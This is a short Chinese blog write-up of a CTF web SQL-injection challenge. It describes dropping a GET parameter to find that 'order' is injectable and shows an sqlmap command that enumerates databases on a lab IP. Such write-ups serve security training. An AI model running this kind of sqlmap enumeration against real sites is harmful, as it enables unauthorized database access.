CTF---Web---SQL注入---10---get传参的删减

本文介绍了在CTF比赛中遇到的一道Web SQL注入题目,通过分析GET参数,确定了注入点为'order'。经过爆字段操作,获取到关键信息BFDE779BF1883CA5,强调了在处理多参数GET请求时,可尝试删减参数寻找潜在的SQL注入漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


前言

题目分类:

CTF—Web—SQL注入—10—get传参的删减


一、题目描述

题目:小试牛刀
在这里插入图片描述

二、解题步骤

1、注入点的确定

Step1:利用http://172.16.15.193/stage/9/get_info.php?title=xiaoshiniudao&order=id

这个网址跑sqlmap,提示title不是注入点。
在这里插入图片描述

Step2:此题为get传参,参数可以删减猜测注入点为order

 sqlmap -u http://172.16.15.193/stage/9/get_info.php?order=id --dbs

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值